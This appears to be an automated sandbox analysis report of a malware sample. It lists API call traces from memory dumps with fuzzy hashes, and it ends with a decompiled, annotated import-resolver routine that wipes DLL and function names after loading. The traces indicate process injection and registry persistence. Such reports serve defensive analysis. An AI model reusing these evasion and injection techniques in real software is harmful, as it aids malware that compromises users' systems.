    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi
  • String ID:
  • API String ID: 2612869081-0
  • Opcode ID: c2dacee3140373e500c22aac8ec47d9c8ec65dfe813f0c9f26dc5badd2c4d201
  • Instruction ID: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
  • Opcode Fuzzy Hash: 4201C028044DC281C42710841061FF9A506EFD13B5C8CAB76DDA13F08B5D0273F53797
  • Instruction Fuzzy Hash: 2a6ed72f7be82828a989acab500aa79ad59f26800ec0c1f59594e6530e87086a
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,00000018,001ED278), ref: 001CAC70
  • memset.NTDLL ref: 001CAC81
  • lstrcmpi.KERNEL32(?,?), ref: 001CACC1
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CACEA
  • memcpy.NTDLL(00000000,?,?), ref: 001CACFE
  • memset.NTDLL ref: 001CAD0B
  • memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD24
  • memcpy.NTDLL(-00000005,001EC42B,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 001CAD3F
  • HeapFree.KERNEL32(00000000,?), ref: 001CAD5C
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy
  • String ID:
  • API String ID: 1573093752-0
  • Opcode ID: f08ef74051028bad1df3046b05b27150d2409501bab8048f9561d94f45d3640f
  • Instruction ID: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
  • Opcode Fuzzy Hash: F9F0FEB01D1901DB8023453EE06037DE502AC442E2B1C8617FD80B525F7F4372E0BF59
  • Instruction Fuzzy Hash: 49f792a003b958594b94fef63a2c1694da6c43edfde979eb277695decca324f2
APIs
  • lstrlenW.KERNEL32(00000000), ref: 001CB606
  • RtlAllocateHeap.NTDLL(00000000,001EAC82), ref: 001CB61C
  • memcpy.NTDLL(00000000,00000000,001EAC80), ref: 001CB62F
  • _wcsupr.NTDLL ref: 001CB63A
  • lstrlenW.KERNEL32(?,001EAC80), ref: 001CB66C
  • RtlAllocateHeap.NTDLL(00000000,?,001EAC80), ref: 001CB681
  • lstrcpyW.KERNEL32(00000000,?), ref: 001CB697
  • lstrcatW.KERNEL32(00000000,001EC940), ref: 001CB6B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB6C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 33
  • API ID: lstrlen$CloseHandleDeleteFileHeapFreeMapViewOfFileRtlAllocateHeapUnmapViewOfFilewcstombs
  • String ID:
  • API String ID: 3071814901-0
  • Opcode ID: d05e3ff4273796c9b17326ba3024fd4693d54f1ec967c9ade7a5abc202e65e4f
  • Instruction ID: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
  • Opcode Fuzzy Hash: 8DF08B71654AC2CBD22778A6A6517BBF901FB532C3C4E3732DC40251681F4232D22B1B
  • Instruction Fuzzy Hash: 7e783e8648c44d89f659e24c24dcd4eaacf23487424efcd1c96aaf08dceaf5d1
APIs
    • Part of subcall function 001C7262: memset.NTDLL ref: 001C7284
    • Part of subcall function 001C7262: lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
    • Part of subcall function 001C7262: OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
    • Part of subcall function 001C7262: CloseHandle.KERNEL32(?), ref: 001C7331
  • MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 001C4D32
  • CloseHandle.KERNEL32(?), ref: 001C4D3E
  • lstrlenW.KERNEL32(00000000), ref: 001C4D58
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C4D69
  • wcstombs.NTDLL ref: 001C4D7A
  • lstrlen.KERNEL32(?), ref: 001C4D87
    • Part of subcall function 001D9462: lstrlen.KERNEL32(-00000002,00000000,?,-00000002,-00000002,?,001C4D99), ref: 001D9472
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • UnmapViewOfFile.KERNEL32(?,?,?,?,00000000,00000001), ref: 001C4DBC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C4DCE
  • DeleteFileW.KERNEL32(?), ref: 001C4DDC
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 49
  • API ID: GetTickCountHeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapRtlImageNtHeaderStrRChrlstrlenwsprintf
  • String ID:
  • API String ID: 473458267-0
  • Opcode ID: 21cd21af9a4aaeb0892998a3b8bf2ca0770d14e129f35d2f1317603fddf0a3d6
  • Instruction ID: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
  • Opcode Fuzzy Hash: 82F05935850C435DC06788E5483AB3BE6417B002D8DDC6A33F9416D2066F8332969B6B
  • Instruction Fuzzy Hash: 233c1588e08a29c017db756c2c3cc83d8e7a4f483530507245655a67d20bfa99
APIs
  • RtlImageNtHeader.NTDLL(?), ref: 001C165E
  • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
  • GetTickCount.KERNEL32 ref: 001C169C
  • wsprintfA.USER32 ref: 001C16AC
  • RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
  • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
  • lstrlen.KERNEL32(00000000), ref: 001C1702
  • RegCloseKey.ADVAPI32(?), ref: 001C171E
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 110
  • API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile
  • String ID:
  • API String ID: 340323113-0
  • Opcode ID: c76374ab722defcc6b7910d2b5a917f55ad2d99158a8d4548ff4996c05cdb32e
  • Instruction ID: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
  • Opcode Fuzzy Hash: B7E05C3D03050183442319B00225F9BAF186F662C7A8C33E2FE84CD6975B01BBE58152
  • Instruction Fuzzy Hash: 4663223eb685f44cb7c3c2feaea3cf8fb5c10da6263795c37b1e1976f57e1679
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
  • WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
  • ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
  • GetLastError.KERNEL32 ref: 001CB9DD
  • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
  • GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
  • CancelIo.KERNEL32(?), ref: 001CBA27
  • CloseHandle.KERNEL32(?), ref: 001CBA37
  • GetLastError.KERNEL32 ref: 001CBA3F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: 7849c8b9b33a94634046e8246dea9d068437be0b98cf428e6df4f247afe7f281
  • Instruction ID: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
  • Opcode Fuzzy Hash: F1F0278087CDC3C3CA49888A09653622058EFE2B45CBC9398B4803901C1FA03D6A2B8E
  • Instruction Fuzzy Hash: 18e037570c349af28e5fb9d2891916f9b52bff2a0339ffa6542edc82ff0ccd9b
APIs
  • PathFindFileNameW.SHLWAPI(01B3618C), ref: 01B31246
  • lstrcmpiW.KERNEL32(00000000,?,01B37494), ref: 01B3124D
  • RegOpenKeyExA.ADVAPI32(80000001,01B38080,00000000,00000000,?,?,01B37494), ref: 01B3127E
  • lstrlenW.KERNEL32(?,01B37494), ref: 01B31292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 01B312AA
  • RegQueryValueExW.ADVAPI32(?,00000000,01B37494,00000000,01B37494,?,01B37494), ref: 01B312C9
  • StrStrIW.SHLWAPI(00000000), ref: 01B312E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B312F9
  • RegCloseKey.ADVAPI32(?,?,01B37494), ref: 01B31302
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID: d
  • API String ID: 307323562-2564639436
  • Opcode ID: 3424cbb1137d2442c81198497add0441f4db132d4a2ce8cb8b6f8920268ef235
  • Instruction ID: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
  • Opcode Fuzzy Hash: 76018E064AAA7143C6022C158545FBAF186EB03FB9C5CF710D560304CE0B4574E1F669
  • Instruction Fuzzy Hash: b8db2ac21e3ce66b9afee30e9f9d0f5fd3c10acb7799db9a356edd2bebb0603d
APIs
  • memset.NTDLL ref: 001DC393
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
    • Part of subcall function 001D90C0: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D90ED
    • Part of subcall function 001D90C0: SetLastError.KERNEL32(00000000,?,001DC3F5,00000000,?,00010007,00000004,?), ref: 001D90F4
  • ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
  • SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
    • Part of subcall function 001DC212: memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC212: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
    • Part of subcall function 001DC212: WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
    • Part of subcall function 001DC212: SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
  • GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
  • ResumeThread.KERNEL32(00000004), ref: 001DC4D6
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 51
  • API ID: CreateFileGetLastErrorHeapFreeRegCloseKeyRegOpenKey
  • String ID: [FILE]$[FILE]
  • API String ID: 3351174444-3230400787
  • Opcode ID: 033c4394e70e99a6bf63e685e4473468f8b4c093a00da4e8f42c8e7bfe120adf
  • Instruction ID: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
  • Opcode Fuzzy Hash: 85F0DD3A594EC3CFD423249020157BAC805FB412E2CAD2716EA807E1C16F8333192F17
  • Instruction Fuzzy Hash: 2fcb9902772c4c4d4bc9c17d65ab76f3f424010ff8a5c77d50f6198a202490f7
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C39AA
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D95E9: lstrlenW.KERNEL32(?,00000000,001EAC80,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D95F5
    • Part of subcall function 001D95E9: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,?,001C1784,00000000,?,001C17F3,?,?,?,?,00000000), ref: 001D961D
    • Part of subcall function 001D95E9: memset.NTDLL ref: 001D962F
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C3A90
  • GetLastError.KERNEL32 ref: 001C3A9B
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C3AB0
  • RegCloseKey.ADVAPI32(?,?,?,?,?), ref: 001C3AC1
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 193527b1eef174f7d3812915e618651906c6adafd0bce5f2d714c946695c6d1b
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: A7F02E4D155F71CAE17D2005187BBAA70C3F39671BD25E9031552B31076991B3292FCC
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			/* Decompiled import resolver: walks the image's import descriptors (table RVA read at
			   _a4 + 0x80, image base in __edi), loads each DLL with LoadLibraryA, resolves every
			   entry with GetProcAddress and writes the address into the IAT. Each DLL and function
			   name string is wiped with memset after use. Returns 0 on success, 0x7e when a DLL
			   fails to load and 0x7f when an import cannot be resolved. */
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t11;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;                                   /* image base */
				_t50 =  &_v16;                                  /* decompiler's stack-pointer tracking, no effect */
				_v16 = _v16 & 0x00000000;                       /* return code = 0 */
				_t33 =  *((intOrPtr*)(_a4 + 0x80));             /* RVA of the import directory */
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;                            /* first IMAGE_IMPORT_DESCRIPTOR */
				_t23 =  *((intOrPtr*)(_t34 + 0xc));             /* descriptor->Name (RVA of DLL name) */
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;                         /* DLL name string */
					_t24 = LoadLibraryA(_t44);
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));            /* wipe the DLL name after loading */
					_t27 =  *_t34;                              /* descriptor->OriginalFirstThunk */
					_t35 =  *((intOrPtr*)(_t34 + 0x10));        /* descriptor->FirstThunk (IAT) */
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;                     /* thunk array to walk */
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20)); /* next descriptor's Name (0x14 + 0xc) */
							_t34 = _t34 + 0x14;                  /* sizeof(IMAGE_IMPORT_DESCRIPTOR) */
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;               /* delta from lookup table to IAT slot */
						_t57 = _t28;
						L8:
						if(_t57 < 0) {                          /* ordinal flag (bit 31) set */
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) { /* outside SizeOfImage */
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;                 /* IMAGE_IMPORT_BY_NAME */
						}
						_t11 = _t28 + 2; // 0x2                 /* skip the Hint field, point at Name */
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));    /* wipe the function name after resolving */
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;                   /* store resolved address in the IAT */
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;                            /* import not found */
						goto L19;
					}
					_t27 = _t35;                                /* no lookup table: walk the IAT itself */
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;                                    /* LoadLibraryA failed */
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
